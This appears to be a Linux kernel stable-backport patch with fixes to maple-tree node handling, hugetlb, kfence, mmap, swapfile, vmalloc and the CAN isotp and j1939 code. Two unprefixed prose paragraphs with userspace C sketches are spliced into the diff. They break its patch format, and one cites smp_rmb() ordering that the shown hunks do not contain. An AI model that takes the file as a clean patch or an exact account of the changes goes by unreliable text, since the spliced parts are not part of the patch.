++		if (unlikely(ma_dead_node(node)))
++			return 1;
++
++	} while (unlikely(offset == node_end));
+ 
+ 	slots = ma_slots(node, mt);
+ 	pivot = mas_safe_pivot(mas, pivots, ++offset, mt);
+@@ -4608,6 +4676,9 @@ static inline int mas_next_node(struct ma_state *mas, struct maple_node *node,
+ 		mt = mte_node_type(mas->node);
+ 		slots = ma_slots(node, mt);
+ 		pivots = ma_pivots(node, mt);
++		if (unlikely(ma_dead_node(node)))
++			return 1;
++
+ 		offset = 0;
+ 		pivot = pivots[0];
+ 	}
+@@ -4654,16 +4725,19 @@ static inline void *mas_next_nentry(struct ma_state *mas,
+ 		return NULL;
+ 	}
+ 
+-	pivots = ma_pivots(node, type);
+ 	slots = ma_slots(node, type);
++	pivots = ma_pivots(node, type);
++	count = ma_data_end(node, type, pivots, mas->max);
++	if (unlikely(ma_dead_node(node)))
++		return NULL;
++
+ 	mas->index = mas_safe_min(mas, pivots, mas->offset);
+-	if (ma_dead_node(node))
++	if (unlikely(ma_dead_node(node)))
+ 		return NULL;
+ 
+ 	if (mas->index > max)
+ 		return NULL;
+ 
+-	count = ma_data_end(node, type, pivots, mas->max);
+ 	if (mas->offset > count)
+ 		return NULL;
+ 
+@@ -4738,6 +4812,11 @@ static inline void *mas_next_entry(struct ma_state *mas, unsigned long limit)
+ 	unsigned long last;
+ 	enum maple_type mt;
+ 
++	if (mas->index > limit) {
++		mas->index = mas->last = limit;
++		mas_pause(mas);
++		return NULL;
++	}
+ 	last = mas->last;
+ retry:
+ 	offset = mas->offset;
+@@ -4811,6 +4890,11 @@ retry:
+ 
+ 	slots = ma_slots(mn, mt);
+ 	pivots = ma_pivots(mn, mt);
++	if (unlikely(ma_dead_node(mn))) {
++		mas_rewalk(mas, index);
++		goto retry;
++	}
++
+ 	if (offset == mt_pivots[mt])
+ 		pivot = mas->max;
+ 	else
+@@ -4844,6 +4928,11 @@ static inline void *mas_prev_entry(struct ma_state *mas, unsigned long min)
+ {
+ 	void *entry;
+ 
++	if (mas->index < min) {
++		mas->index = mas->last = min;
++		mas->node = MAS_NONE;
++		return NULL;
++	}
+ retry:
+ 	while (likely(!mas_is_none(mas))) {
+ 		entry = mas_prev_nentry(mas, min, mas->index);
+@@ -5389,24 +5478,26 @@ no_gap:
+ }
+ 
+ /*
+- * mas_dead_leaves() - Mark all leaves of a node as dead.
++ * mte_dead_leaves() - Mark all leaves of a node as dead.
+  * @mas: The maple state
+  * @slots: Pointer to the slot array
++ * @type: The maple node type
+  *
+  * Must hold the write lock.
+  *
+  * Return: The number of leaves marked as dead.
+  */
+ static inline
+-unsigned char mas_dead_leaves(struct ma_state *mas, void __rcu **slots)
++unsigned char mte_dead_leaves(struct maple_enode *enode, struct maple_tree *mt,
++			      void __rcu **slots)
+ {
+ 	struct maple_node *node;
+ 	enum maple_type type;
+ 	void *entry;
+ 	int offset;
+ 
+-	for (offset = 0; offset < mt_slot_count(mas->node); offset++) {
+-		entry = mas_slot_locked(mas, slots, offset);
++	for (offset = 0; offset < mt_slot_count(enode); offset++) {
++		entry = mt_slot(mt, slots, offset);
+ 		type = mte_node_type(entry);
+ 		node = mte_to_node(entry);
+ 		/* Use both node and type to catch LE & BE metadata */
+@@ -5414,7 +5505,6 @@ unsigned char mas_dead_leaves(struct ma_state *mas, void __rcu **slots)
+ 			break;
+ 
+ 		mte_set_node_dead(entry);
+-		smp_wmb(); /* Needed for RCU */
+ 		node->type = type;
+ 		rcu_assign_pointer(slots[offset], node);
+ 	}
+@@ -5422,151 +5512,160 @@ unsigned char mas_dead_leaves(struct ma_state *mas, void __rcu **slots)
+ 	return offset;
+ }
+ 
+-static void __rcu **mas_dead_walk(struct ma_state *mas, unsigned char offset)
++/**
++ * mte_dead_walk() - Walk down a dead tree to just before the leaves
++ * @enode: The maple encoded node
++ * @offset: The starting offset
++ *
++ * Note: This can only be used from the RCU callback context.
++ */
++static void __rcu **mte_dead_walk(struct maple_enode **enode, unsigned char offset)
+ {
+ 	struct maple_node *node, *next;
+ 	void __rcu **slots = NULL;
+ 
+-	next = mas_mn(mas);
++	next = mte_to_node(*enode);
+ 	do {
+-		mas->node = ma_enode_ptr(next);
+-		node = mas_mn(mas);
++		*enode = ma_enode_ptr(next);
++		node = mte_to_node(*enode);
+ 		slots = ma_slots(node, node->type);
+-		next = mas_slot_locked(mas, slots, offset);
++		next = rcu_dereference_protected(slots[offset],
++					lock_is_held(&rcu_callback_map));
+ 		offset = 0;
+ 	} while (!ma_is_leaf(next->type));
+ 
+ 	return slots;
+ }
+ 
++/**
++ * mt_free_walk() - Walk & free a tree in the RCU callback context
++ * @head: The RCU head that's within the node.
++ *
++ * Note: This can only be used from the RCU callback context.
++ */
+ static void mt_free_walk(struct rcu_head *head)
+ {
+ 	void __rcu **slots;
+ 	struct maple_node *node, *start;
+-	struct maple_tree mt;
++	struct maple_enode *enode;
+ 	unsigned char offset;
+ 	enum maple_type type;
+-	MA_STATE(mas, &mt, 0, 0);
+ 
+ 	node = container_of(head, struct maple_node, rcu);
+ 
+ 	if (ma_is_leaf(node->type))
+ 		goto free_leaf;
+ 
+-	mt_init_flags(&mt, node->ma_flags);
+-	mas_lock(&mas);
+ 	start = node;
+-	mas.node = mt_mk_node(node, node->type);
+-	slots = mas_dead_walk(&mas, 0);
+-	node = mas_mn(&mas);
++	enode = mt_mk_node(node, node->type);
++	slots = mte_dead_walk(&enode, 0);
++	node = mte_to_node(enode);
+ 	do {
+ 		mt_free_bulk(node->slot_len, slots);
+ 		offset = node->parent_slot + 1;
+-		mas.node = node->piv_parent;
+-		if (mas_mn(&mas) == node)
+-			goto start_slots_free;
+-
+-		type = mte_node_type(mas.node);
+-		slots = ma_slots(mte_to_node(mas.node), type);
+-		if ((offset < mt_slots[type]) && (slots[offset]))
+-			slots = mas_dead_walk(&mas, offset);
+-
+-		node = mas_mn(&mas);
++		enode = node->piv_parent;
++		if (mte_to_node(enode) == node)
++			goto free_leaf;
++
++		type = mte_node_type(enode);
++		slots = ma_slots(mte_to_node(enode), type);
++		if ((offset < mt_slots[type]) &&
++		    rcu_dereference_protected(slots[offset],
++					      lock_is_held(&rcu_callback_map)))
++			slots = mte_dead_walk(&enode, offset);
++		node = mte_to_node(enode);
+ 	} while ((node != start) || (node->slot_len < offset));
+ 
+ 	slots = ma_slots(node, node->type);
+ 	mt_free_bulk(node->slot_len, slots);
+ 
+-start_slots_free:
+-	mas_unlock(&mas);
+ free_leaf:
+ 	mt_free_rcu(&node->rcu);
+ }
+ 
+-static inline void __rcu **mas_destroy_descend(struct ma_state *mas,
+-			struct maple_enode *prev, unsigned char offset)
++static inline void __rcu **mte_destroy_descend(struct maple_enode **enode,
++	struct maple_tree *mt, struct maple_enode *prev, unsigned char offset)
+ {
+ 	struct maple_node *node;
+-	struct maple_enode *next = mas->node;
++	struct maple_enode *next = *enode;
+ 	void __rcu **slots = NULL;
++	enum maple_type type;
++	unsigned char next_offset = 0;
+ 
+ 	do {
+-		mas->node = next;
+-		node = mas_mn(mas);
+-		slots = ma_slots(node, mte_node_type(mas->node));
+-		next = mas_slot_locked(mas, slots, 0);
++		*enode = next;
++		node = mte_to_node(*enode);
++		type = mte_node_type(*enode);
++		slots = ma_slots(node, type);
++		next = mt_slot_locked(mt, slots, next_offset);
+ 		if ((mte_dead_node(next)))
+-			next = mas_slot_locked(mas, slots, 1);
++			next = mt_slot_locked(mt, slots, ++next_offset);
+ 
+-		mte_set_node_dead(mas->node);
+-		node->type = mte_node_type(mas->node);
++		mte_set_node_dead(*enode);
++		node->type = type;
+ 		node->piv_parent = prev;
+ 		node->parent_slot = offset;
+-		offset = 0;
+-		prev = mas->node;
++		offset = next_offset;
++		next_offset = 0;
++		prev = *enode;
+ 	} while (!mte_is_leaf(next));
+ 
+ 	return slots;
+ }
+ 
+-static void mt_destroy_walk(struct maple_enode *enode, unsigned char ma_flags,
++static void mt_destroy_walk(struct maple_enode *enode, struct maple_tree *mt,
+ 			    bool free)
+ {
+ 	void __rcu **slots;
+ 	struct maple_node *node = mte_to_node(enode);
+ 	struct maple_enode *start;
+-	struct maple_tree mt;
+-
+-	MA_STATE(mas, &mt, 0, 0);
+ 
+-	if (mte_is_leaf(enode))
++	if (mte_is_leaf(enode)) {
++		node->type = mte_node_type(enode);
+ 		goto free_leaf;
++	}
+ 
+-	mt_init_flags(&mt, ma_flags);
+-	mas_lock(&mas);
+-
+-	mas.node = start = enode;
+-	slots = mas_destroy_descend(&mas, start, 0);
+-	node = mas_mn(&mas);
++	start = enode;
++	slots = mte_destroy_descend(&enode, mt, start, 0);
++	node = mte_to_node(enode); // Updated in the above call.
+ 	do {
+ 		enum maple_type type;
+ 		unsigned char offset;
+ 		struct maple_enode *parent, *tmp;
+ 
+-		node->slot_len = mas_dead_leaves(&mas, slots);
++		node->slot_len = mte_dead_leaves(enode, mt, slots);
+ 		if (free)
+ 			mt_free_bulk(node->slot_len, slots);
+ 		offset = node->parent_slot + 1;
+-		mas.node = node->piv_parent;
+-		if (mas_mn(&mas) == node)
+-			goto start_slots_free;
++		enode = node->piv_parent;
++		if (mte_to_node(enode) == node)
++			goto free_leaf;
+ 
+-		type = mte_node_type(mas.node);
+-		slots = ma_slots(mte_to_node(mas.node), type);
++		type = mte_node_type(enode);
++		slots = ma_slots(mte_to_node(enode), type);
+ 		if (offset >= mt_slots[type])
+ 			goto next;
+ 
+-		tmp = mas_slot_locked(&mas, slots, offset);
++		tmp = mt_slot_locked(mt, slots, offset);
+ 		if (mte_node_type(tmp) && mte_to_node(tmp)) {
+-			parent = mas.node;
+-			mas.node = tmp;
+-			slots = mas_destroy_descend(&mas, parent, offset);
++			parent = enode;
++			enode = tmp;
++			slots = mte_destroy_descend(&enode, mt, parent, offset);
+ 		}
+ next:
+-		node = mas_mn(&mas);
+-	} while (start != mas.node);
++		node = mte_to_node(enode);
++	} while (start != enode);
+ 
+-	node = mas_mn(&mas);
+-	node->slot_len = mas_dead_leaves(&mas, slots);
++	node = mte_to_node(enode);
++	node->slot_len = mte_dead_leaves(enode, mt, slots);
+ 	if (free)
+ 		mt_free_bulk(node->slot_len, slots);
+ 
+-start_slots_free:
+-	mas_unlock(&mas);
+-
+ free_leaf:
+ 	if (free)
+ 		mt_free_rcu(&node->rcu);
++	else
++		mt_clear_meta(mt, node, node->type);
+ }
+ 
+ /*
+@@ -5582,15 +5681,18 @@ static inline void mte_destroy_walk(struct maple_enode *enode,
+ 	struct maple_node *node = mte_to_node(enode);
+ 
+ 	if (mt_in_rcu(mt)) {
+-		mt_destroy_walk(enode, mt->ma_flags, false);
++		mt_destroy_walk(enode, mt, false);
+ 		call_rcu(&node->rcu, mt_free_walk);
+ 	} else {
+-		mt_destroy_walk(enode, mt->ma_flags, true);
++		mt_destroy_walk(enode, mt, true);
+ 	}
+ }
+ 
+ static void mas_wr_store_setup(struct ma_wr_state *wr_mas)
+ {
++	if (unlikely(mas_is_paused(wr_mas->mas)))
++		mas_reset(wr_mas->mas);
++
+ 	if (!mas_is_start(wr_mas->mas)) {
+ 		if (mas_is_none(wr_mas->mas)) {
+ 			mas_reset(wr_mas->mas);
+@@ -5726,6 +5828,7 @@ int mas_preallocate(struct ma_state *mas, void *entry, gfp_t gfp)
+ void mas_destroy(struct ma_state *mas)
+ {
+ 	struct maple_alloc *node;
++	unsigned long total;
+ 
+ 	/*
+ 	 * When using mas_for_each() to insert an expected number of elements,
+@@ -5748,14 +5851,20 @@ void mas_destroy(struct ma_state *mas)
+ 	}
+ 	mas->mas_flags &= ~(MA_STATE_BULK|MA_STATE_PREALLOC);
+ 
+-	while (mas->alloc && !((unsigned long)mas->alloc & 0x1)) {
++	total = mas_allocated(mas);
++	while (total) {
+ 		node = mas->alloc;
+ 		mas->alloc = node->slot[0];
+-		if (node->node_count > 0)
+-			mt_free_bulk(node->node_count,
+-				     (void __rcu **)&node->slot[1]);
++		if (node->node_count > 1) {
++			size_t count = node->node_count - 1;
++
++			mt_free_bulk(count, (void __rcu **)&node->slot[1]);
++			total -= count;
++		}
+ 		kmem_cache_free(maple_node_cache, node);
++		total--;
+ 	}
++
+ 	mas->alloc = NULL;
+ }
+ EXPORT_SYMBOL_GPL(mas_destroy);
+@@ -5893,6 +6002,7 @@ void *mas_prev(struct ma_state *mas, unsigned long min)
+ 	if (!mas->index) {
+ 		/* Nothing comes before 0 */
+ 		mas->last = 0;
++		mas->node = MAS_NONE;
+ 		return NULL;
+ 	}
+ 
+@@ -5983,6 +6093,9 @@ void *mas_find(struct ma_state *mas, unsigned long max)
+ 		mas->index = ++mas->last;
+ 	}
+ 
++	if (unlikely(mas_is_none(mas)))
++		mas->node = MAS_START;
++
+ 	if (unlikely(mas_is_start(mas))) {
+ 		/* First run or continue */
+ 		void *entry;
+@@ -6594,11 +6707,11 @@ static inline void *mas_first_entry(struct ma_state *mas, struct maple_node *mn,
+ 	while (likely(!ma_is_leaf(mt))) {
+ 		MT_BUG_ON(mas->tree, mte_dead_node(mas->node));
+ 		slots = ma_slots(mn, mt);
+-		pivots = ma_pivots(mn, mt);
+-		max = pivots[0];
+ 		entry = mas_slot(mas, slots, 0);
++		pivots = ma_pivots(mn, mt);
+ 		if (unlikely(ma_dead_node(mn)))
+ 			return NULL;
++		max = pivots[0];
+ 		mas->node = entry;
+ 		mn = mas_mn(mas);
+ 		mt = mte_node_type(mas->node);
+@@ -6618,13 +6731,13 @@ static inline void *mas_first_entry(struct ma_state *mas, struct maple_node *mn,
+ 	if (likely(entry))
+ 		return entry;
+ 
+-	pivots = ma_pivots(mn, mt);
+-	mas->index = pivots[0] + 1;
+ 	mas->offset = 1;
+ 	entry = mas_slot(mas, slots, 1);
++	pivots = ma_pivots(mn, mt);
+ 	if (unlikely(ma_dead_node(mn)))
+ 		return NULL;
+ 
++	mas->index = pivots[0] + 1;
+ 	if (mas->index > limit)
+ 		goto none;
+ 
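
Many of the maple-tree hunks above share one shape: read speculatively, then re-check the node's dead mark (ordered by smp_rmb()) before trusting the copy, restarting the walk on failure. Reduced to its essentials as a userspace sketch, not the kernel types:

#include <stdatomic.h>
#include <stdbool.h>

struct node {
	unsigned long pivot;
	atomic_bool dead;
};

/* Returns false if the node died under us; the caller must restart. */
static bool read_pivot(struct node *n, unsigned long *out)
{
	*out = n->pivot;				/* speculative copy */
	atomic_thread_fence(memory_order_acquire);	/* ~ smp_rmb() */
	return !atomic_load_explicit(&n->dead, memory_order_relaxed);
}
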
+diff --git a/mm/hugetlb.c b/mm/hugetlb.c
+index 52475c4262e45..d3ffa0fd49e57 100644
+--- a/mm/hugetlb.c
++++ b/mm/hugetlb.c
+@@ -5469,7 +5469,7 @@ static vm_fault_t hugetlb_wp(struct mm_struct *mm, struct vm_area_struct *vma,
+ 		       struct page *pagecache_page, spinlock_t *ptl)
+ {
+ 	const bool unshare = flags & FAULT_FLAG_UNSHARE;
+-	pte_t pte;
++	pte_t pte = huge_ptep_get(ptep);
+ 	struct hstate *h = hstate_vma(vma);
+ 	struct page *old_page, *new_page;
+ 	int outside_reserve = 0;
+@@ -5480,6 +5480,17 @@ static vm_fault_t hugetlb_wp(struct mm_struct *mm, struct vm_area_struct *vma,
+ 	VM_BUG_ON(unshare && (flags & FOLL_WRITE));
+ 	VM_BUG_ON(!unshare && !(flags & FOLL_WRITE));
+ 
++	/*
++	 * Never handle CoW for uffd-wp protected pages.  It should be only
++	 * handled when the uffd-wp protection is removed.
++	 *
++	 * Note that only the CoW optimization path (in hugetlb_no_page())
++	 * can trigger this, because hugetlb_fault() will always resolve
++	 * uffd-wp bit first.
++	 */
++	if (!unshare && huge_pte_uffd_wp(pte))
++		return 0;
++
+ 	/*
+ 	 * hugetlb does not support FOLL_FORCE-style write faults that keep the
+ 	 * PTE mapped R/O such as maybe_mkwrite() would do.
+@@ -5495,7 +5506,6 @@ static vm_fault_t hugetlb_wp(struct mm_struct *mm, struct vm_area_struct *vma,
+ 		return 0;
+ 	}
+ 
+-	pte = huge_ptep_get(ptep);
+ 	old_page = pte_page(pte);
+ 
+ 	delayacct_wpcopy_start();
+diff --git a/mm/kfence/core.c b/mm/kfence/core.c
+index c3d04753806a2..a477b7fb8aa33 100644
+--- a/mm/kfence/core.c
++++ b/mm/kfence/core.c
+@@ -557,15 +557,11 @@ static unsigned long kfence_init_pool(void)
+ 	 * enters __slab_free() slow-path.
+ 	 */
+ 	for (i = 0; i < KFENCE_POOL_SIZE / PAGE_SIZE; i++) {
+-		struct slab *slab = page_slab(&pages[i]);
++		struct slab *slab = page_slab(nth_page(pages, i));
+ 
+ 		if (!i || (i % 2))
+ 			continue;
+ 
+-		/* Verify we do not have a compound head page. */
+-		if (WARN_ON(compound_head(&pages[i]) != &pages[i]))
+-			return addr;
+-
+ 		__folio_set_slab(slab_folio(slab));
+ #ifdef CONFIG_MEMCG
+ 		slab->memcg_data = (unsigned long)&kfence_metadata[i / 2 - 1].objcg |
+@@ -598,12 +594,26 @@ static unsigned long kfence_init_pool(void)
+ 
+ 		/* Protect the right redzone. */
+ 		if (unlikely(!kfence_protect(addr + PAGE_SIZE)))
+-			return addr;
++			goto reset_slab;
+ 
+ 		addr += 2 * PAGE_SIZE;
+ 	}
+ 
+ 	return 0;
++
++reset_slab:
++	for (i = 0; i < KFENCE_POOL_SIZE / PAGE_SIZE; i++) {
++		struct slab *slab = page_slab(nth_page(pages, i));
++
++		if (!i || (i % 2))
++			continue;
++#ifdef CONFIG_MEMCG
++		slab->memcg_data = 0;
++#endif
++		__folio_clear_slab(slab_folio(slab));
++	}
++
++	return addr;
+ }
+ 
+ static bool __init kfence_init_pool_early(void)
+@@ -633,16 +643,6 @@ static bool __init kfence_init_pool_early(void)
+ 	 * fails for the first page, and therefore expect addr==__kfence_pool in
+ 	 * most failure cases.
+ 	 */
+-	for (char *p = (char *)addr; p < __kfence_pool + KFENCE_POOL_SIZE; p += PAGE_SIZE) {
+-		struct slab *slab = virt_to_slab(p);
+-
+-		if (!slab)
+-			continue;
+-#ifdef CONFIG_MEMCG
+-		slab->memcg_data = 0;
+-#endif
+-		__folio_clear_slab(slab_folio(slab));
+-	}
+ 	memblock_free_late(__pa(addr), KFENCE_POOL_SIZE - (addr - (unsigned long)__kfence_pool));
+ 	__kfence_pool = NULL;
+ 	return false;
+diff --git a/mm/memory.c b/mm/memory.c
+index f6f93e5b6b023..747b7ea30f890 100644
+--- a/mm/memory.c
++++ b/mm/memory.c
+@@ -3619,8 +3619,21 @@ static vm_fault_t remove_device_exclusive_entry(struct vm_fault *vmf)
+ 	struct vm_area_struct *vma = vmf->vma;
+ 	struct mmu_notifier_range range;
+ 
+-	if (!folio_lock_or_retry(folio, vma->vm_mm, vmf->flags))
++	/*
++	 * We need a reference to lock the folio because we don't hold
++	 * the PTL so a racing thread can remove the device-exclusive
++	 * entry and unmap it. If the folio is free the entry must
++	 * have been removed already. If it happens to have already
++	 * been re-allocated after being freed all we do is lock and
++	 * unlock it.
++	 */
++	if (!folio_try_get(folio))
++		return 0;
++
++	if (!folio_lock_or_retry(folio, vma->vm_mm, vmf->flags)) {
++		folio_put(folio);
+ 		return VM_FAULT_RETRY;
++	}
+ 	mmu_notifier_range_init_owner(&range, MMU_NOTIFY_EXCLUSIVE, 0, vma,
+ 				vma->vm_mm, vmf->address & PAGE_MASK,
+ 				(vmf->address & PAGE_MASK) + PAGE_SIZE, NULL);
+@@ -3633,6 +3646,7 @@ static vm_fault_t remove_device_exclusive_entry(struct vm_fault *vmf)
+ 
+ 	pte_unmap_unlock(vmf->pte, vmf->ptl);
+ 	folio_unlock(folio);
++	folio_put(folio);
+ 
+ 	mmu_notifier_invalidate_range_end(&range);
+ 	return 0;
+diff --git a/mm/mmap.c b/mm/mmap.c
+index 1777148868494..fe1db604dc49e 100644
+--- a/mm/mmap.c
++++ b/mm/mmap.c
+@@ -2308,7 +2308,7 @@ do_mas_align_munmap(struct ma_state *mas, struct vm_area_struct *vma,
+ 	int count = 0;
+ 	int error = -ENOMEM;
+ 	MA_STATE(mas_detach, &mt_detach, 0, 0);
+-	mt_init_flags(&mt_detach, MT_FLAGS_LOCK_EXTERN);
++	mt_init_flags(&mt_detach, mas->tree->ma_flags & MT_FLAGS_LOCK_MASK);
+ 	mt_set_external_lock(&mt_detach, &mm->mmap_lock);
+ 
+ 	if (mas_preallocate(mas, vma, GFP_KERNEL))
+@@ -3095,6 +3095,7 @@ void exit_mmap(struct mm_struct *mm)
+ 	 */
+ 	set_bit(MMF_OOM_SKIP, &mm->flags);
+ 	mmap_write_lock(mm);
++	mt_clear_in_rcu(&mm->mm_mt);
+ 	free_pgtables(&tlb, &mm->mm_mt, vma, FIRST_USER_ADDRESS,
+ 		      USER_PGTABLES_CEILING);
+ 	tlb_finish_mmu(&tlb);
+diff --git a/mm/swapfile.c b/mm/swapfile.c
+index b72908df52ac9..71db6d8a1ea30 100644
+--- a/mm/swapfile.c
++++ b/mm/swapfile.c
+@@ -679,6 +679,7 @@ static void __del_from_avail_list(struct swap_info_struct *p)
+ {
+ 	int nid;
+ 
++	assert_spin_locked(&p->lock);
+ 	for_each_node(nid)
+ 		plist_del(&p->avail_lists[nid], &swap_avail_heads[nid]);
+ }
+@@ -2428,8 +2429,8 @@ SYSCALL_DEFINE1(swapoff, const char __user *, specialfile)
+ 		spin_unlock(&swap_lock);
+ 		goto out_dput;
+ 	}
+-	del_from_avail_list(p);
+ 	spin_lock(&p->lock);
++	del_from_avail_list(p);
+ 	if (p->prio < 0) {
+ 		struct swap_info_struct *si = p;
+ 		int nid;
+diff --git a/mm/vmalloc.c b/mm/vmalloc.c
+index ccaa461998f3c..d606e53c650e5 100644
+--- a/mm/vmalloc.c
++++ b/mm/vmalloc.c
+@@ -3056,9 +3056,11 @@ static void *__vmalloc_area_node(struct vm_struct *area, gfp_t gfp_mask,
+ 	 * allocation request, free them via __vfree() if any.
+ 	 */
+ 	if (area->nr_pages != nr_small_pages) {
+-		warn_alloc(gfp_mask, NULL,
+-			"vmalloc error: size %lu, page order %u, failed to allocate pages",
+-			area->nr_pages * PAGE_SIZE, page_order);
++		/* vm_area_alloc_pages() can also fail due to a fatal signal */
++		if (!fatal_signal_pending(current))
++			warn_alloc(gfp_mask, NULL,
++				"vmalloc error: size %lu, page order %u, failed to allocate pages",
++				area->nr_pages * PAGE_SIZE, page_order);
+ 		goto fail;
+ 	}
+ 
+diff --git a/net/can/isotp.c b/net/can/isotp.c
+index 9bc344851704e..5761d4ab839dd 100644
+--- a/net/can/isotp.c
++++ b/net/can/isotp.c
+@@ -119,7 +119,8 @@ enum {
+ 	ISOTP_WAIT_FIRST_FC,
+ 	ISOTP_WAIT_FC,
+ 	ISOTP_WAIT_DATA,
+-	ISOTP_SENDING
++	ISOTP_SENDING,
++	ISOTP_SHUTDOWN,
+ };
+ 
+ struct tpcon {
+@@ -880,8 +881,8 @@ static enum hrtimer_restart isotp_tx_timer_handler(struct hrtimer *hrtimer)
+ 					     txtimer);
+ 	struct sock *sk = &so->sk;
+ 
+-	/* don't handle timeouts in IDLE state */
+-	if (so->tx.state == ISOTP_IDLE)
++	/* don't handle timeouts in IDLE or SHUTDOWN state */
++	if (so->tx.state == ISOTP_IDLE || so->tx.state == ISOTP_SHUTDOWN)
+ 		return HRTIMER_NORESTART;
+ 
+ 	/* we did not get any flow control or echo frame in time */
+@@ -918,7 +919,6 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ {
+ 	struct sock *sk = sock->sk;
+ 	struct isotp_sock *so = isotp_sk(sk);
+-	u32 old_state = so->tx.state;
+ 	struct sk_buff *skb;
+ 	struct net_device *dev;
+ 	struct canfd_frame *cf;
+@@ -928,23 +928,24 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 	int off;
+ 	int err;
+ 
+-	if (!so->bound)
++	if (!so->bound || so->tx.state == ISOTP_SHUTDOWN)
+ 		return -EADDRNOTAVAIL;
+ 
++wait_free_buffer:
+ 	/* we do not support multiple buffers - for now */
+-	if (cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SENDING) != ISOTP_IDLE ||
+-	    wq_has_sleeper(&so->wait)) {
+-		if (msg->msg_flags & MSG_DONTWAIT) {
+-			err = -EAGAIN;
+-			goto err_out;
+-		}
++	if (wq_has_sleeper(&so->wait) && (msg->msg_flags & MSG_DONTWAIT))
++		return -EAGAIN;
+ 
+-		/* wait for complete transmission of current pdu */
+-		err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
+-		if (err)
+-			goto err_out;
++	/* wait for complete transmission of current pdu */
++	err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++	if (err)
++		goto err_event_drop;
+ 
+-		so->tx.state = ISOTP_SENDING;
++	if (cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SENDING) != ISOTP_IDLE) {
++		if (so->tx.state == ISOTP_SHUTDOWN)
++			return -EADDRNOTAVAIL;
++
++		goto wait_free_buffer;
+ 	}
+ 
+ 	if (!size || size > MAX_MSG_LENGTH) {
+@@ -1074,7 +1075,9 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 
+ 	if (wait_tx_done) {
+ 		/* wait for complete transmission of current pdu */
+-		wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++		err = wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++		if (err)
++			goto err_event_drop;
+ 
+ 		if (sk->sk_err)
+ 			return -sk->sk_err;
+@@ -1082,13 +1085,15 @@ static int isotp_sendmsg(struct socket *sock, struct msghdr *msg, size_t size)
+ 
+ 	return size;
+ 
++err_event_drop:
++	/* got signal: force tx state machine to be idle */
++	so->tx.state = ISOTP_IDLE;
++	hrtimer_cancel(&so->txfrtimer);
++	hrtimer_cancel(&so->txtimer);
+ err_out_drop:
+ 	/* drop this PDU and unlock a potential wait queue */
+-	old_state = ISOTP_IDLE;
+-err_out:
+-	so->tx.state = old_state;
+-	if (so->tx.state == ISOTP_IDLE)
+-		wake_up_interruptible(&so->wait);
++	so->tx.state = ISOTP_IDLE;
++	wake_up_interruptible(&so->wait);
+ 
+ 	return err;
+ }
+@@ -1120,7 +1125,7 @@ static int isotp_recvmsg(struct socket *sock, struct msghdr *msg, size_t size,
+ 	if (ret < 0)
+ 		goto out_err;
+ 
+-	sock_recv_timestamp(msg, sk, skb);
++	sock_recv_cmsgs(msg, sk, skb);
+ 
+ 	if (msg->msg_name) {
+ 		__sockaddr_check_size(ISOTP_MIN_NAMELEN);
+@@ -1150,10 +1155,12 @@ static int isotp_release(struct socket *sock)
+ 	net = sock_net(sk);
+ 
+ 	/* wait for complete transmission of current pdu */
+-	wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE);
++	while (wait_event_interruptible(so->wait, so->tx.state == ISOTP_IDLE) == 0 &&
++	       cmpxchg(&so->tx.state, ISOTP_IDLE, ISOTP_SHUTDOWN) != ISOTP_IDLE)
++		;
+ 
+ 	/* force state machines to be idle also when a signal occurred */
+-	so->tx.state = ISOTP_IDLE;
++	so->tx.state = ISOTP_SHUTDOWN;
+ 	so->rx.state = ISOTP_IDLE;
+ 
+ 	spin_lock(&isotp_notifier_lock);
+@@ -1608,6 +1615,21 @@ static int isotp_init(struct sock *sk)
+ 	return 0;
+ }
+ 
++static __poll_t isotp_poll(struct file *file, struct socket *sock, poll_table *wait)
++{
++	struct sock *sk = sock->sk;
++	struct isotp_sock *so = isotp_sk(sk);
++
++	__poll_t mask = datagram_poll(file, sock, wait);
++	poll_wait(file, &so->wait, wait);
++
++	/* Check for false positives due to TX state */
++	if ((mask & EPOLLWRNORM) && (so->tx.state != ISOTP_IDLE))
++		mask &= ~(EPOLLOUT | EPOLLWRNORM);
++
++	return mask;
++}
++
+ static int isotp_sock_no_ioctlcmd(struct socket *sock, unsigned int cmd,
+ 				  unsigned long arg)
+ {
+@@ -1623,7 +1645,7 @@ static const struct proto_ops isotp_ops = {
+ 	.socketpair = sock_no_socketpair,
+ 	.accept = sock_no_accept,
+ 	.getname = isotp_getname,
+-	.poll = datagram_poll,
++	.poll = isotp_poll,
+ 	.ioctl = isotp_sock_no_ioctlcmd,
+ 	.gettstamp = sock_gettstamp,
+ 	.listen = sock_no_listen,
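
The release path above loops until it both observes IDLE and wins the IDLE -> SHUTDOWN transition; the same claim loop in plain C11 terms, with a busy-wait standing in for sleeping on so->wait:

#include <stdatomic.h>

enum { ISOTP_IDLE, ISOTP_SENDING, ISOTP_SHUTDOWN };

static void claim_for_shutdown(atomic_int *state)
{
	int expected;

	do {
		while (atomic_load(state) != ISOTP_IDLE)
			;	/* kernel: wait_event_interruptible() */
		expected = ISOTP_IDLE;
	} while (!atomic_compare_exchange_strong(state, &expected,
						 ISOTP_SHUTDOWN));
}
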
+diff --git a/net/can/j1939/transport.c b/net/can/j1939/transport.c
+index 848b60c9ef79e..bd8ec24338324 100644
+--- a/net/can/j1939/transport.c
++++ b/net/can/j1939/transport.c
+@@ -604,7 +604,10 @@ sk_buff *j1939_tp_tx_dat_new(struct j1939_priv *priv,
+ 	/* reserve CAN header */
+ 	skb_reserve(skb, offsetof(struct can_frame, data));
+ 
+-	memcpy(skb->cb, re_skcb, sizeof(skb->cb));
++	/* skb->cb must be large enough to hold a j1939_sk_buff_cb structure */
++	BUILD_BUG_ON(sizeof(skb->cb) < sizeof(*re_skcb));
++
++	memcpy(skb->cb, re_skcb, sizeof(*re_skcb));
+ 	skcb = j1939_skb_to_cb(skb);
+ 	if (swap_src_dst)
+ 		j1939_skbcb_swap(skcb);
+diff --git a/net/core/netpoll.c b/net/core/netpoll.c
+index 9be762e1d0428..4ac8d0ad9f6fc 100644
+--- a/net/core/netpoll.c
